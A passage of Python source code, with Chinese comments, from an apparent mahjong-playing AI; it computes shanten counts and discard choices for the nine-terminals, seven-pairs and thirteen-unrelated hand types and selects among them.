jiuyao_info[\"left_cards\"] = cards_copy\n jiuyao_info[\"xts\"] = 14 - sum(yaojiu_num)\n return jiuyao_info\n\n @staticmethod\n def defend_V1(left_cards=[], king_card=None):\n \"\"\"\n 幺九牌出牌决策\n 按出牌次序discards_order,直接出非幺九牌\n :param left_cards: 剩余牌\n :param king_card: 宝牌\n :return:\n \"\"\"\n discards_order = [0x02, 0x08, 0x12, 0x18, 0x22, 0x28, 0x03, 0x07, 0x13, 0x17, 0x23, 0x27, 0x04, 0x06, 0x14,\n 0x16, 0x24, 0x26, 0x05, 0x15, 0x25]\n\n # print(\"jiuyao,defend_V1,left_cards=\",left_cards)\n for card in discards_order:\n if card in left_cards:\n # 宝牌处理:有宝的情况,宝牌后出\n if card == king_card:\n continue\n return card\n\n if king_card in left_cards:\n return king_card\n\n return None\n\n #\n\n def one_of(self, array1, array2):\n \"\"\"\n 判断一个数组是否存在于另一个数组中\n :param array1: 数组1\n :param array2: 数组2\n :return:\n \"\"\"\n for e in array2:\n if (array1 == e).all():\n return True\n return False\n\n def recommend_op(self, op_card, cards=[], suits=[], left_num=[], king_card=None, canchi=False, self_turn=False):\n \"\"\"\n 幺九牌型的动作决策\n 有幺九牌的碰杠直接碰杠,非幺九不碰杠\n :param op_card: 操作牌\n :param cards: 手牌\n :param suits: 副露\n :param left_num: 剩余牌\n :param king_card: 宝牌\n :param canchi: 吃牌权限\n :param self_turn: 是否是自己回合\n :return: [] 动作组合牌\n \"\"\"\n jiuyao_info = self.jiuyao_info(cards=cards, suits=suits, left_num=left_num)\n # 本场次只考虑九幺的情况\n # 处理补杠和暗杠的情况\n yaojiu_num_hand = jiuyao_info[\"yaojiu_num_hand\"]\n # yaojiu_num = jiuyao_info[\"yaojiu_num\"]\n if self_turn: # 补杠 暗杠\n for i in range(len(yaojiu_num_hand)):\n if yaojiu_num_hand[i] == 1 and suits != [] and self.one_of(\n np.array([self.yaojiu_cards[i], self.yaojiu_cards[i], self.yaojiu_cards[i]]), np.array(suits)):\n return [self.yaojiu_cards[i], self.yaojiu_cards[i], self.yaojiu_cards[i], self.yaojiu_cards[i]]\n elif yaojiu_num_hand[i] == 4:\n return [self.yaojiu_cards[i], self.yaojiu_cards[i], self.yaojiu_cards[i], self.yaojiu_cards[i]]\n return []\n else:\n if op_card in self.yaojiu_cards:\n if yaojiu_num_hand[self.yaojiu_cards.index(op_card)] == 3: # 明杠\n return [op_card, op_card, op_card, op_card]\n elif yaojiu_num_hand[self.yaojiu_cards.index(op_card)] == 2 and jiuyao_info[\"xts\"] > 1: # 碰 增加填胡不再碰的情况\n return [op_card, op_card, op_card]\n else:\n return []\n else:\n return []\n\n def recommend_card(self, cards=[], suits=[], left_num=[], king_card=None):\n \"\"\"\n 出牌接口\n :param cards:手牌\n :param suits: 副露\n :param left_num: 剩余牌\n :param king_card: 宝牌\n :return: card 出牌\n \"\"\"\n jiuyao_info = self.jiuyao_info(cards=cards, suits=suits, left_num=left_num)\n # jiuyao_info[\"yaojiu_num\"]==-1:\n left_cards = jiuyao_info[\"left_cards\"]\n return self.defend_V1(left_cards=left_cards, king_card=king_card)\n\n\n# 七对牌型类\nclass qidui:\n def __init__(self):\n pass\n\n def get_cards_num(self, cards=[]):\n \"\"\"\n 获取手牌中每张牌的数量\n :param cards: 手牌\n :return: cards_unique, cards_num 去重后的手牌及其数量\n \"\"\"\n # if len(suits)!=0:\n # return\n\n cards_unique = np.unique(cards)\n cards_num = [0] * len(cards_unique)\n for i in range(len(cards_unique)):\n cards_num[i] = cards.count(cards_unique[i])\n\n return cards_unique, cards_num\n\n def qidui_info(self, cards=[], suits=[], left_num=[], king_num=0):\n \"\"\"\n 七对的相关信息{}\n 包括cards_unique 去重后的手牌\n cards_num 每张牌的数量\n duipai 对牌\n left_cards 剩余牌\n xts 向听数\n :param cards: 手牌\n :param suits: 副露\n :param left_num:剩余牌\n :param king_num: 宝牌\n :return: {} qidui_info 字典格式存储的七对信息\n \"\"\"\n qidui_info = {}\n if len(suits) != 0:\n qidui_info[\"xts\"] = 14\n return qidui_info\n\n cards_unique, cards_num = self.get_cards_num(cards=cards)\n 
duipai = []\n        left_cards = []\n        for i in range(len(cards_unique)):\n            if cards_num[i] == 4:\n                duipai.append(cards_unique[i])\n                duipai.append(cards_unique[i])\n            elif cards_num[i] == 3:\n                duipai.append(cards_unique[i])\n                left_cards.append(cards_unique[i])\n            elif cards_num[i] == 2:\n                duipai.append(cards_unique[i])\n            elif cards_num[i] == 1:\n                left_cards.append(cards_unique[i])\n        # for card in cards_unique:\n        #     if\n        qidui_info[\"cards_unique\"] = cards_unique\n        qidui_info[\"cards_num\"] = cards_num\n        qidui_info[\"duipai\"] = duipai\n        qidui_info[\"left_cards\"] = left_cards\n        qidui_info[\"xts\"] = 14 - (len(duipai) * 2 + 7 - len(duipai)) - king_num\n\n        return qidui_info\n\n
    def defend_V1(self, left_cards=[], left_num=[]):\n        \"\"\"\n        七对出牌决策\n        出剩余牌数量最低的牌\n        :param left_cards:孤张\n        :param left_num: 剩余牌数量\n        :return: 最佳出牌\n        \"\"\"\n        discards_order = [0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x01, 0x09, 0x11, 0x19, 0x21, 0x29, 0x02, 0x08,\n                          0x12, 0x18, 0x22, 0x28, 0x03, 0x07, 0x13, 0x17, 0x23, 0x27, 0x04, 0x06, 0x14, 0x16, 0x24,\n                          0x26, 0x05, 0x15, 0x25]\n        effective_cards_num = [0] * len(left_cards)\n        for i in range(len(left_cards)):\n            # print(\"qidui,\")\n            effective_cards_num[i] = left_num[translate16_33(left_cards[i])]\n        min_num = 4\n        min_index = 0\n        for i in range(len(effective_cards_num)):\n            if min_num > effective_cards_num[i]:\n                min_num = effective_cards_num[i]  # 忘了写了\n                min_index = i\n        # print (\"ph.defend_V1,min_index\",min_index)\n        # print(left_cards)\n        if left_cards == []:\n            return 0x00\n        else:\n            return left_cards[min_index]\n        return None\n\n
    def recommend_card(self, cards=[], suits=[], left_num=[], king_card=None):\n        \"\"\"\n        七对出牌接口\n        :param cards:手牌\n        :param suits: 副露\n        :param left_num: 剩余牌\n        :param king_card: 宝牌\n        :return: 最佳出牌\n        \"\"\"\n        cards_copy = MJ.deepcopy(cards)\n        king_num = 0  # 无宝时宝牌数为0,保证下面引用king_num不会抛NameError\n        if king_card != None:\n            # cards_copy=copy.deepcopy(cards)\n            king_num = cards.count(king_card)\n            for i in range(king_num):\n                cards_copy.remove(king_card)\n\n        qidui_info = self.qidui_info(cards=cards_copy, suits=suits, left_num=left_num, king_num=king_num)\n        left_cards = qidui_info[\"left_cards\"]\n        return self.defend_V1(left_cards=left_cards, left_num=left_num)\n\n    # 七对不考虑吃碰杠情况\n    def recommend_op(self, op_card, cards=[], suits=[]):\n        \"\"\"\n        七对不考虑动作决策,直接返回[]\n        :param op_card: 操作牌\n        :param cards: 手牌\n        :param suits: 副露\n        :return: []\n        \"\"\"\n        return []\n\n\n
# 十三烂牌型类\nclass ssl:\n    # todo 宝牌翻倍的\n    def __init__(self, handcards, suits, discards):\n        \"\"\"\n        十三烂类变量初始化\n        :param handcards:手牌\n        :param suits: 副露\n        :param discards: 弃牌\n        \"\"\"\n        self.handcards = handcards\n        self.suits = suits\n\n        self.type = None\n\n        self.discards = discards\n\n
    def wait_types_13(self):\n        \"\"\"\n        十三浪的向听数判断,手中十四张牌中,序数牌间隔大于等于3,字牌没有重复所组成的牌形\n        先计算0x0,0x1,0x2中的牌,起始位a,则a+3最多有几个,在wait上减,0x3计算不重复最多的数\n        :return: wait_num, handcardsapart, effectiveCards, entire_discards 向听数 万条筒具体拆分情况 万条筒的具体有效牌 完全废牌\n        \"\"\"\n\n        # numCanUsejing = 0\n        tile_list = copy.copy(self.handcards)\n        # numJing = 0\n        wait_num = 14  # 表示向听数\n        numZi = 0  # 记录字牌个数\n        handcardsapart = []  # 万条筒具体拆分情况\n        effectiveCards = []  # 万条筒的具体有效牌\n        entire_discards = []  # 完全废牌\n\n        # if jing:  # 有精的话就把精给拿出来\n        #     for i in range(len(tile_list) - 1, -1, -1):  # 有精先拿出来 用逆序查找的方法或者while的方法可以避免越界\n        #         if tile_list[i] == jing or tile_list[i] == fuJing:  # 拿出正精和副精\n        #             tile_list.pop(i)  # 删除精 并且精加一\n        #             numJing += 1\n        # print(tile_list,numJing)\n        if self.suits != []:\n            wait_num = 14\n            return wait_num, [], [], []\n        else:\n            L = set(tile_list)  # 去除重复手牌\n            L_num0 = []  # 万数牌\n            L_num1 = []  # 条数牌\n            L_num2 = []  # 筒数牌\n            L_num3 = []  # 字牌数\n            
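# NOTE (illustrative): a suit contributes only tiles whose pairwise gaps are >= 3,\n            # e.g. wan tiles {1, 4, 9} all count (gaps 3 and 5) while {1, 2} can keep at\n            # most one of the two; each distinct honor tile simply subtracts 1 from wait_num.\n            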
for i in L:\n if i & 0xf0 == 0x30:\n # 计算字牌的向听数\n numZi += 1\n wait_num -= 1\n if i & 0xf0 == 0x00:\n L_num0.append(i & 0x0f)\n if i & 0xf0 == 0x10:\n L_num1.append(i & 0x0f)\n if i & 0xf0 == 0x20:\n L_num2.append(i & 0x0f)\n if i & 0xf0 == 0x30:\n L_num3.append(i & 0x0f)\n # print(L_num3)\n # print(wait_num)\n if L_num0 != []:\n self.type = 0\n # print (\"L_num0=\",L_num0)\n a, b, c, d = self.calculate_13(L_num0) # 减去万数牌的向听数\n # print (a,b,c)\n wait_num -= a\n handcardsapart.append(b)\n effectiveCards.append(c)\n entire_discards.extend(d)\n else:\n handcardsapart.append([])\n effectiveCards.append([])\n if L_num1 != []:\n self.type = 1\n a, b, c, d = self.calculate_13(L_num1) # 减去条数牌的向听数\n wait_num -= a\n handcardsapart.append(b)\n effectiveCards.append(c)\n entire_discards.extend([e + 16 for e in d])\n else:\n handcardsapart.append([])\n effectiveCards.append([])\n if L_num2 != []:\n self.type = 2\n a, b, c, d = self.calculate_13(L_num2) # 减去筒数牌的向听数\n wait_num -= a\n handcardsapart.append(b)\n effectiveCards.append(c)\n entire_discards.extend([e + 32 for e in d])\n else:\n handcardsapart.append([])\n effectiveCards.append([])\n if L_num3 != []:\n self.type = 3\n c = self.getzieffectiveCards(L_num3)\n handcardsapart.append(L_num3)\n effectiveCards.append(c)\n else:\n handcardsapart.append([])\n effectiveCards.append([])\n\n return wait_num, handcardsapart, effectiveCards, entire_discards\n\n def calculate_13(self, tiles): # 返回 向听数,手牌情况,有效牌\n \"\"\"\n 计算十三烂中各花色的向听数,拆分情况,有效牌,完全废牌\n :param tiles: 某一花色的手牌\n :return: wait_num, handcardsapart, effectiveCards, entire_discards 向听数 万条筒具体拆分情况 万条筒的具体有效牌 完全废牌\n \"\"\"\n # 计算十三浪的数牌最大向听数\n waitnumMax1 = max((tiles.count(1) + tiles.count(4) + tiles.count(7)),\n (tiles.count(1) + tiles.count(4) + tiles.count(8)),\n (tiles.count(1) + tiles.count(4) + tiles.count(9)),\n (tiles.count(1) + tiles.count(5) + tiles.count(8)),\n (tiles.count(1) + tiles.count(5) + tiles.count(9)),\n (tiles.count(1) + tiles.count(6) + tiles.count(9)),\n (tiles.count(2) + tiles.count(5) + tiles.count(8)),\n (tiles.count(2) + tiles.count(5) + tiles.count(9)),\n (tiles.count(2) + tiles.count(6) + tiles.count(9)),\n (tiles.count(3) + tiles.count(6) + tiles.count(9)))\n waitnumMax2 = max((tiles.count(2) + tiles.count(7)), (tiles.count(3) + tiles.count(7)),\n (tiles.count(3) + tiles.count(8)), )\n ssl_table = [[1, 6, 9], [1, 4, 9], [1, 4, 7], [1, 4, 8], [1, 5, 9], [1, 5, 8], [2, 5, 9], [2, 5, 8], [3, 6, 9],\n [2, 6, 9]]\n if max(waitnumMax1, waitnumMax2) == 3: # 当向听数为3 的时候 直接返回3,无有效牌\n handcardapart = [] # 手牌拆分情况\n # for i in range(len(tiles) - 2):\n # if tiles[i + 1] - tiles[i] >= 3 and tiles[i + 2] - tiles[i + 1] >= 3:\n #\n # handcardapart = [tiles[i], tiles[i + 1], tiles[i + 2]]\n # break\n # print(\"ssl,tiles=\",tiles)\n entire_discards = [] # 完全废牌\n for i in ssl_table:\n if i[0] in tiles and i[1] in tiles and i[2] in tiles:\n # print(\"i=\",i)\n handcardapart = i\n tmp = copy.copy(tiles)\n tmp.remove(i[0])\n tmp.remove(i[1])\n tmp.remove(i[2])\n entire_discards = tmp\n break\n return 3, handcardapart, [], entire_discards\n elif max(waitnumMax1, waitnumMax2) == 2: # 当向听数为2 的时候 返回向听数\n youxiao, entire_discards = self.geteffectiveCards(tiles)\n return 2, youxiao[0], youxiao[1], entire_discards\n elif max(waitnumMax1, waitnumMax2) == 1: # 当向听数只有1 的时候\n # 20190411.12.18 修正向听数为1的情况\n effective_cards = []\n ssl_one_list = [1, 9, 2, 8, 3, 7, 4, 6, 5]\n ssl_one_efc = [[4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6], [5, 6, 7, 8, 9], [1, 2, 3, 4, 5], [6, 7, 8, 9],\n [1, 2, 3, 4], [1, 7, 8, 9], [1, 
2, 3, 9], [1, 2, 8, 9]]\n for i in range(len(ssl_one_list)):\n if ssl_one_list[i] in tiles:\n return 1, [ssl_one_list[i]], ssl_one_efc[i], []\n # 没有这种花色时的情况\n return 0, [], [1, 2, 3, 4, 5, 6, 7, 8, 9], []\n\n @staticmethod\n def getTable():\n \"\"\"\n 建十三烂的表(每个元素:【【牌型】,【有效牌集合】,有效牌个数】)\n :return: 十三烂的表\n \"\"\"\n table = [[[1, 4], [7, 8, 9], 3], [[1, 5], [8, 9], 2], [[1, 6], [9], 1], [[1, 7], [4], 1], [[1, 8], [4, 5], 2],\n [[1, 9], [4, 5, 6], 3], [[2, 5], [8, 9], 2], [[2, 6], [9], 1], [[2, 7], [], 0], [[2, 8], [5], 1],\n [[2, 9], [5, 6], 2], [[3, 6], [9], 1], [[3, 7], [], 0], [[3, 8], [], 0], [[3, 9], [6], 1],\n [[4, 7], [1], 1], [[4, 8], [1], 1], [[4, 9], [1], 1], [[5, 8], [1, 2], 2], [[5, 9], [1, 2], 2],\n [[6, 9], [1, 2, 3], 3]]\n return table\n\n @staticmethod\n def get2N(cards=[]):\n \"\"\"\n 计算十三烂万条筒花色的搭子集合及剩余牌\n :param cards: 某一类非字牌\n :return: 所有可能的搭子\n \"\"\"\n all2N = [] # 2N\n left_cards = [] # 废牌\n for i in cards:\n for j in range(i + 3, 10, 1): # 20190411修改,9改10\n if j in cards:\n all2N.append([i, j])\n # 添加废牌\n tmp = copy.copy(cards)\n tmp.remove(i)\n tmp.remove(j)\n left_cards.extend(tmp) # all2N[1].append()\n return all2N, left_cards\n\n def geteffectiveCards(self, cards):\n \"\"\"\n 当某一花色的十三烂牌的有用牌为2张时,获取有效牌数量最多的拆分组合\n 获取万条筒的手牌分布情况,有效牌分布,有效牌的实际个数(非字牌)\n :param cards: 某一花色的手牌\n :return: effective 手牌情况,有效牌,有效牌实际个数, entire_discards 完全废牌\n \"\"\"\n effective = [[], [], 0] # 手牌情况,有效牌,有效牌实际个数\n entire_discards = [] # 完全废牌\n all2N, left_cards = self.get2N(cards) # 获取当前手牌所有2N\n for card in left_cards:\n if left_cards.count(card) == len(left_cards):\n entire_discards.append(card)\n ssl2NTable = self.getTable() # 获取十三烂2N表\n for two2N in ssl2NTable:\n if two2N[0] in all2N: # 如果手牌里的2N与库里的相同\n if self.getEffectiveNum(two2N[1]) >= effective[2]: # 如果当前有效牌多于有效牌\n effective[1] = two2N[1] # 当前有效牌赋给有效牌\n effective[0] = two2N[0] # 把当前手牌情况放进去\n effective[2] = self.getEffectiveNum(two2N[1])\n # print (\"ssl.geteffectiveCards=\",effective)\n return effective, entire_discards\n\n def getzieffectiveCards(self, cards):\n \"\"\"\n 获取字牌的有效牌\n :param cards:字牌\n :return: 字牌的有效牌\n \"\"\"\n effectivecards = []\n allZi = [1, 2, 3, 4, 5, 6, 7]\n for i in allZi:\n if i not in cards:\n effectivecards.append(i)\n return effectivecards\n\n def translate(self, op_card, type):\n \"\"\"\n 个位数和type转换到 0-33 /34转换\n :param op_card: 操作牌\n :param type:花色\n :return: 0-33索引\n \"\"\"\n if type == 0: # 万字1-9对应 0-8\n return op_card - 1\n elif type == 1: # 条字1-9对应 9-17\n return op_card - 1 + 9\n elif type == 2: # 筒字1-9 对应18-26\n return op_card - 1 + 18\n elif type == 3: # 字牌1-7 对应 27 - 33\n return op_card - 1 + 27\n\n def translate2(self, i): # 1-34转换到16进制的card\n \"\"\"\n 将1-34转化为牌值\n :param i:\n :return:\n \"\"\"\n if i >= 10 and i <= 18:\n i = i + 7\n elif i >= 19 and i <= 27:\n i = i + 14\n elif i >= 28 and i <= 34:\n i = i + 21\n return i\n\n def getEffectiveNum(self, effectiveCards):\n \"\"\"\n 获取有效牌的数量\n 输入effectiveCards有效牌集合,返回有效牌数量\n :param effectiveCards: 有效牌集合\n :return: 有效牌数量\n \"\"\"\n Numeffective = len(effectiveCards) * 4\n for eC in effectiveCards:\n Numeffective -= self.discards[\n self.translate(eC, self.type)] # 减去弃牌表中的有效牌 # Numeffective -= self.handcards.count(eC) # 减去手牌中的有效牌\n return Numeffective\n\n def ssl_info(self, left_num=[]):\n \"\"\"\n 十三烂信息\n :param left_num:有效牌数量\n :return: {} 字典格式存储的十三烂信息\n \"\"\"\n ssl_info = {}\n # print(\"ssl,wait_types_13=\",self.wait_types_13())\n # effctive_cards=[[],[],[],[]]每种花色的有效牌,万条筒取值为1-9,字为1-7\n xts, split_cards_, effective_cards, entire_discards = 
self.wait_types_13()\n # print(\"ssl,split_cards_=\",split_cards_)\n if xts == 14:\n ssl_info[\"xts\"] = xts\n return ssl_info\n split_cards = []\n # print (split_cards)\n split_cards.append(split_cards_[0])\n split_cards.append([e + 16 for e in split_cards_[1]])\n split_cards.append([e + 32 for e in split_cards_[2]])\n split_cards.append([e + 48 for e in split_cards_[3]])\n left_cards = copy.copy(self.handcards)\n # print(\"ssl_info,split_cards=\",split_cards)\n for s_cards in split_cards:\n for card in s_cards:\n left_cards.remove(card)\n\n ssl_info[\"xts\"] = xts # 向听数\n ssl_info[\"split_cards\"] = split_cards # 有用的十三烂牌\n ssl_info[\"effective_cards\"] = effective_cards # 有效牌\n ssl_info[\"left_cards\"] = left_cards # 去除十三烂后的剩余牌\n ssl_info[\"entire_discards\"] = entire_discards # 完全废牌\n\n return ssl_info\n\n def defend_V1(self, left_cards, entire_discards):\n \"\"\"\n 十三烂出牌策略\n 按出牌次序discards_order 直接出废牌\n :param left_cards: 剩余牌\n :param entire_discards: 完全废牌\n :return: 最佳出牌\n \"\"\"\n # print(\"ssl,defend_V1,left_cards=\",left_cards)\n discards_order = [0x03, 0x07, 0x13, 0x17, 0x23, 0x27, 0x04, 0x06, 0x14, 0x16, 0x24, 0x26, 0x02, 0x08, 0x12,\n 0x18, 0x22, 0x28, 0x05, 0x15, 0x25, 0x01, 0x09, 0x11, 0x19, 0x21, 0x29, # 留91,可能会转牌型\n 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37]\n # 先出完全废牌\n for card in discards_order:\n if card in entire_discards:\n return card\n # 先出aa\n for card in left_cards:\n if self.handcards.count(card) >= 2:\n return card\n for card in discards_order:\n if card in left_cards:\n return card\n\n def recommend_card(self, ):\n \"\"\"\n 十三烂出牌接口\n :return: 最佳出牌\n \"\"\"\n ssl_info = self.ssl_info()\n return self.defend_V1(ssl_info[\"left_cards\"], ssl_info[\"entire_discards\"])\n\n def recommend_op(self):\n \"\"\"\n 十三烂动作接口\n 十三烂不考虑动作操作\n :return: []\n \"\"\"\n return []\n\n\ndef translate16_33(i):\n \"\"\"\n 将牌值16进制转化为0-33的下标索引\n :param i: 牌值\n :return: 数组下标\n \"\"\"\n i = int(i)\n if i >= 0x01 and i <= 0x09:\n i = i - 1\n elif i >= 0x11 and i <= 0x19:\n i = i - 8\n elif i >= 0x21 and i <= 0x29:\n i = i - 15\n elif i >= 0x31 and i <= 0x37:\n i = i - 22\n else:\n # i=1/0\n # print(\"translate16_33 is error,i=%d\" % i)\n i = -1\n return i\n\n\ndef convert_hex2index(a):\n \"\"\"\n 将牌值16进制转化为0-33的下标索引\n :param a: 牌\n :return: 数组下标\n \"\"\"\n if a > 0 and a < 0x10:\n return a - 1\n if a > 0x10 and a < 0x20:\n return a - 8\n if a > 0x20 and a < 0x30:\n return a - 15\n if a > 0x30 and a < 0x40:\n return a - 22\n\n\ndef trandfer_discards(discards, discards_op, handcards):\n \"\"\"\n 获取场面剩余牌��量\n 计算手牌和场面牌的数量,再计算未知牌的数量\n :param discards: 弃牌\n :param discards_op: 场面副露\n :param handcards: 手牌\n :return: left_num, discards_list 剩余牌列表,已出现的牌数量列表\n \"\"\"\n discards_map = {0x01: 0, 0x02: 1, 0x03: 2, 0x04: 3, 0x05: 4, 0x06: 5, 0x07: 6, 0x08: 7, 0x09: 8, 0x11: 9, 0x12: 10,\n 0x13: 11, 0x14: 12, 0x15: 13, 0x16: 14, 0x17: 15, 0x18: 16, 0x19: 17, 0x21: 18, 0x22: 19, 0x23: 20,\n 0x24: 21, 0x25: 22, 0x26: 23, 0x27: 24, 0x28: 25, 0x29: 26, 0x31: 27, 0x32: 28, 0x33: 29, 0x34: 30,\n 0x35: 31, 0x36: 32, 0x37: 33, }\n # print (\"discards=\",discards)\n # print (\"discards_op=\",discards_op)\n left_num = [4] * 34\n discards_list = [0] * 34\n for per in discards:\n for item in per:\n discards_list[discards_map[item]] += 1\n left_num[discards_map[item]] -= 1\n for seat_op in discards_op:\n for op in seat_op:\n for item in op:\n discards_list[discards_map[item]] += 1\n left_num[discards_map[item]] -= 1\n for item in handcards:\n left_num[discards_map[item]] -= 1\n\n # print 
(\"trandfer_discards,left_num=\",left_num)\n return left_num, discards_list\n\n\n# 获取list中的最小值和下标\ndef get_min(list=[]):\n \"\"\"\n 获取最小xts的下标\n :param list: 向听数列表\n :return: 返回最小向听数及其下标\n \"\"\"\n min = 14\n index = 0\n for i in range(len(list)):\n if list[i] < min:\n min = list[i]\n index = i\n return min, index\n\n\ndef paixing_choose(cards=[], suits=[], king_card=None, discards=[], discards_op=[], op_card=None, fei_king=0):\n \"\"\"\n 牌型选择\n 通过计算向听数来判断\n :param cards: 手牌\n :param suits: 副露\n :param king_card:宝牌\n :param discards: 弃牌\n :param discards_op: 场面副露\n :param op_card: 操作牌\n :param fei_king: 飞宝数\n :return: 牌型序号 0为平胡 1 为九幺 2七对 3十三烂\n \"\"\"\n left_num, discards_list = trandfer_discards(discards=discards, discards_op=discards_op, handcards=cards)\n\n # king_num = 0\n if king_card is not None:\n # left_num[translate16_33(king_card)] = 0\n left_num[translate16_33(pre_king(king_card))] -= 1\n out_king_cards = copy.copy(cards)\n king_num = cards.count(king_card)\n for i in range(king_num):\n out_king_cards.remove(king_card)\n # xts, t3N, suits, t2N, [aa, ab, ac], left_cards, effctive_cards, split_cards, w,split_len=pinghu().sys_info()\n # 0, 1 , 2, 3, 4, 5, 6, 7 , 8 9\n cards_op = copy.copy(cards)\n out_king_cards_op = copy.copy(out_king_cards)\n if op_card != None:\n cards_op.append(op_card)\n out_king_cards_op.append(op_card)\n pinghu_info = pinghu(cards_op, suits, leftNum=left_num, discards=discards, discards_real=[], discardsOp=discards_op,\n round=0, remainNum=sum(left_num), seat_id=0, kingCard=king_card, fei_king=fei_king,\n op_card=op_card).sys_info_V3(cards=cards_op, suits=suits, left_num=left_num,\n kingCard=king_card)\n jiuyao_info = jiuyao().jiuyao_info(cards=cards, suits=suits, left_num=left_num)\n qidui_info = qidui().qidui_info(cards=out_king_cards, suits=suits, left_num=left_num, king_num=king_num)\n ssl_info = ssl(cards, suits, discards_list).ssl_info()\n # print (\"[pinghu_info[0],jiuyao_info[0],qidui_info[0],ssl_info[0]]=\",\n # [pinghu_info[0][4], jiuyao_info[\"xts\"], qidui_info[\"xts\"], ssl_info[\"xts\"]])\n # if ssl_info[\"xts\"]!=14 and len(ssl_info[\"split_cards\"][3])<=4:\n # ssl_w=2\n # else:\n # ssl_w=1\n # print 2\n min, index = get_min(list=[pinghu_info[0][4], jiuyao_info[\"xts\"] - 2, qidui_info[\"xts\"] + 1, ssl_info[\"xts\"] + 1])\n return index\n\n\ndef pre_king(king_card=None):\n \"\"\"\n 计算宝牌的前一张\n :param king_card: 宝牌\n :return:宝牌的前一张牌\n \"\"\"\n if king_card == None:\n return None\n if king_card == 0x01:\n return 0x09\n elif king_card == 0x11:\n return 0x19\n elif king_card == 0x21:\n return 0x29\n elif king_card == 0x31:\n return 0x37\n else:\n return king_card - 1\n\n\ndef recommend_card(cards=[], suits=[], king_card=None, discards=[], discards_op=[], fei_king=0, remain_num=136,\n round=0, seat_id=0):\n \"\"\"\n 功能:推荐出牌接口\n 思路:使用向听数作为牌型选择依据,对最小xts的牌型,再调用相应的牌型类出牌决策\n :param cards: 手牌\n :param suits: 副露\n :param king_card: 宝牌\n :param discards: 弃牌\n :param discards_op: 场面副露\n :param fei_king: 飞宝数\n :param remain_num: 剩余牌\n :return: outCard 推荐出牌\n \"\"\"\n # logger.info(\"recommond card start...\")\n # 更新全局变量\n global T_SELFMO, LEFT_NUM, t2tot3_dict, t1tot3_dict, TIME_START, RT1, RT2, RT3, ROUND\n ROUND = round\n MJ.KING = king_card\n TIME_START = time.time()\n LEFT_NUM, discards_list = trandfer_discards(discards=discards, discards_op=discards_op, handcards=cards)\n LEFT_NUM[translate16_33(pre_king(king_card))] -= 1\n # LEFT_NUM[MJ.convert_hex2index(king_card)] *= 0.25 #宝牌获取到的概率/4\n # for i in range(len(LEFT_NUM)):\n # if LEFT_NUM[i]==4:\n # 
LEFT_NUM[i]-=0.5\n # elif LEFT_NUM[i]==3:\n # LEFT_NUM[i]-=0.2\n # elif LEFT_NUM[i]==2:\n # LEFT_NUM[i]-=0.1\n # remain_num = min(40, sum(LEFT_NUM))\n # print remain_num\n # remain_num = 40\n # remain_num = sum(LEFT_NUM)\n # if remain_num == 0 or remain_num==136:\n # remain_num = sum(LEFT_NUM)\n\n if round < 100:\n T_SELFMO = [float(i) / remain_num for i in LEFT_NUM]\n RT1 = []\n RT2 = []\n RT3 = []\n else:\n # 当round>=8时,使用对手建模\n # cards, suits, king_card, fei_king, discards, discardsOp, discardsReal, round, seat_id, xts_round, M\n _, T_SELFMO, RT1, RT2, RT3 = DFM.DefendModel(cards=cards, suits=suits, king_card=king_card, fei_king=fei_king,\n discards=discards, discardsOp=discards_op, discardsReal=discards,\n round=round, seat_id=seat_id, xts_round=DFM.xts_round,\n M=250).getWTandRT()\n # RT1 = []\n # RT2 = []\n # RT3 = []\n # t1tot2_dict = MJ.t1tot2_info(T_selfmo=T_SELFMO)\n\n t1tot3_dict = MJ.t1tot3_info(T_selfmo=T_SELFMO, RT1=[], RT2=[], RT3=[])\n t2tot3_dict = MJ.t2tot3_info(T_selfmo=T_SELFMO, RT1=[], RT2=[], RT3=[])\n\n # print t1tot3_dict\n # print t2tot3_dict\n left_num = LEFT_NUM\n paixing = paixing_choose(cards=cards, suits=suits, king_card=king_card, discards=discards, discards_op=discards_op,\n fei_king=fei_king)\n if remain_num == 136:\n remain_num = sum(LEFT_NUM)\n if paixing == 0:\n # print(\"choose pinghu\")\n # start=time.time()\n recommond_card = pinghu(cards, suits, leftNum=left_num, discards=discards, discards_real=[],\n discardsOp=discards_op,\n round=round, remainNum=remain_num, seat_id=0, kingCard=king_card,\n fei_king=fei_king).recommend_card()\n end = time.time()\n if end - TIME_START > 3:\n pass\n # logger.error(\"overtime %s,%s,%s,%s\", end - TIME_START, cards, suits, king_card)\n return recommond_card\n elif paixing == 1:\n # print(\"choose jiuyao\")\n return jiuyao().recommend_card(cards=cards, suits=suits, left_num=left_num)\n elif paixing == 2:\n # print(\"choose qidui\")\n return qidui().recommend_card(cards=cards, suits=suits, left_num=left_num, king_card=king_card)\n elif paixing == 3:\n # print(\"choose ssl\")\n return ssl(cards, suits, discards_list).recommend_card()\n\n\ndef recommend_card_rf(cards=[], suits=[], king_card=None, discards=[], discards_op=[], fei_king=0, remain_num=136,\n round=0, seat_id=0):\n \"\"\"\n 功能:推荐出牌接口\n 思路:使用向听数作为牌型选择依据,对最小xts的牌型,再调用相应的牌型类出牌决策\n :param cards: 手牌\n :param suits: 副露\n :param king_card: 宝牌\n :param discards: 弃牌\n :param discards_op: 场面副露\n :param fei_king: 飞宝数\n :param remain_num: 剩余牌\n :return: outCard 推荐出牌\n \"\"\"\n # logger.info(\"recommond card start...\")\n # 更新全局变量\n global T_SELFMO, LEFT_NUM, t2tot3_dict, t1tot3_dict, TIME_START, RT1, RT2, RT3, ROUND\n ROUND = round\n MJ.KING = king_card\n TIME_START = time.time()\n LEFT_NUM, discards_list = trandfer_discards(discards=discards, discards_op=discards_op, handcards=cards)\n LEFT_NUM[translate16_33(pre_king(king_card))] -= 1\n # LEFT_NUM[MJ.convert_hex2index(king_card)] *= 0.25 #宝牌获取到的概率/4\n # for i in range(len(LEFT_NUM)):\n # if LEFT_NUM[i]==4:\n # LEFT_NUM[i]-=0.5\n # elif LEFT_NUM[i]==3:\n # LEFT_NUM[i]-=0.2\n # elif LEFT_NUM[i]==2:\n # LEFT_NUM[i]-=0.1\n # remain_num = min(40, sum(LEFT_NUM))\n # print remain_num\n # remain_num = 40\n # remain_num = sum(LEFT_NUM)\n # if remain_num == 0 or remain_num==136:\n # remain_num = sum(LEFT_NUM)\n\n if round < 100:\n T_SELFMO = [float(i) / remain_num for i in LEFT_NUM]\n RT1 = []\n RT2 = []\n RT3 = []\n else:\n # 当round>=8时,使用对手建模\n # cards, suits, king_card, fei_king, discards, discardsOp, discardsReal, round, 
